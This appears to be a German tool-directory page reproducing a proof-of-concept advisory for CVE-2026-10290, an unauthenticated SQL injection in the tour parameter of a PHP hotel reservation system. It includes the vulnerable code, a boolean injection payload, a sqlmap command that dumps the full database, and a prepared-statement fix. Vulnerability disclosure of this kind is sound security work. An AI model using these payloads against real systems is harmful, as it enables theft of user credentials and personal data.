Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10290-SQLI — Proof-of-Concept für nicht authentifizierte SQL-Injection in Hotel and Tourism Reservation System 1.0, das Datenbankextraktion über den Tour-Parameter demonstriert. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-10290-sqli
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungDatenbanksicherheit
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

Proof-of-Concept für nicht authentifizierte SQL-Injection in Hotel and Tourism Reservation System 1.0, das Datenbankextraktion über den Tour-Parameter demonstriert.

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hotel- und Tourismus-Reservierungssystem - Nicht authentifizierte SQL-Injection in tour.php

Schwachstellendetails

FeldDetails
TitelHotel- und Tourismus-Reservierungssystem - SQL-Injection über tour GET-Parameter
Anbietercode-projects.org
Anbieter-URLhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
ProduktHotel- und Tourismus-Reservierungssystem
Version1.0
SchwachstellentypSQL-Injection
CWECWE-89
CVSS-Score9.8 (Kritisch)
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Betroffene Datei/ht/tour.php
Betroffener Parametertour (GET)
Authentifizierung erforderlichNein
Remote ausnutzbarJa
ForscherSyed Imad Uddin Alvi

Beschreibung

Eine kritische SQL-Injection-Schwachstelle existiert im tour GET-Parameter von tour.php im Hotel- und Tourismus-Reservierungssystem 1.0. Der Parameter wird direkt in eine rohe SQL-Abfrage ohne Sanitisierung, Prepared Statements oder Eingabevalidierung eingefügt. Ein nicht authentifizierter entfernter Angreifer kann die Abfrage manipulieren, um Daten aus der Datenbank zu extrahieren, zu ändern oder zu löschen. Die Schwachstelle wurde durch einen vollständigen Datenbank-Dump mit sqlmap bestätigt.

Verwundbarer Code in tour.php:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID wird direkt aus $_GET['tour'] übernommen und ohne jegliche Sanitisierung in die SQL-Abfrage interpoliert.


Schritte zur Reproduktion

Einrichtung: Installieren Sie das Hotel- und Tourismus-Reservierungssystem 1.0 auf XAMPP und greifen Sie unter http://<target>/ht/ darauf zu.

Schritt 1 — Besuchen Sie eine beliebige Tour-Seite als nicht authentifizierter Benutzer:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

Schritt 2 — Injizieren Sie ein einfaches Anführungszeichen, um die SQL-Abfrage zu brechen und die Schwachstelle zu bestätigen:

root@kitploit:~
http://<target>/ht/tour.php?tour='

Ergebnis: Ein fataler MySQL-Fehler wird ausgegeben – dies bestätigt, dass unsanitisierte Eingabe die SQL-Abfrage erreicht.

Screenshot 2026-05-12 001643

Schritt 3 — Bestätigen Sie die SQLi mit einer booleschen Payload:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

Ergebnis: Die Seite lädt normal mit Tour-Daten – boolesche Injektion erfolgreich.

Screenshot 2026-05-12 001654

Schritt 4 — Dumpen Sie die gesamte Datenbank mit sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

Ergebnis: sqlmap extrahiert erfolgreich alle Tabellen in hotel_db inklusive users, rooms, tour_reserves, gallery – vollständige Datenbank-Kompromittierung bestätigt.

Screenshot 2026-05-12 001722

Auswirkungen

Ein nicht authentifizierter entfernter Angreifer kann:

  • Alle Daten aus der Datenbank extrahieren, einschließlich Benutzeranmeldeinformationen, E-Mails, Telefonnummern und Reservierungsdetails
  • Authentifizierung umgehen durch Extrahieren von Admin-Anmeldeinformationen
  • Datenbankeinträge ändern oder löschen
  • Potentiell Remote-Code-Ausführung über INTO OUTFILE erreichen, wenn Dateiberechtigungen erteilt sind

Ursache

Der tour GET-Parameter wird direkt in eine rohe SQL-Abfrage interpoliert, ohne Verwendung von Prepared Statements, parametrisierten Abfragen oder Eingabe-Sanitisierung:

root@kitploit:~
// SCHWACHSTELLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// BEHOBEN — Prepared Statements verwenden
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

Referenzen

  • CWE-89: Unsachgemäße Neutralisierung spezieller Elemente in einem SQL-Befehl
  • OWASP: SQL-Injection
  • Hotel- und Tourismus-Reservierungssystem — code-projects.org

Entdeckt von

Syed Imad Uddin Alvi — Unabhängiger Sicherheitsforscher

Tool herunterladen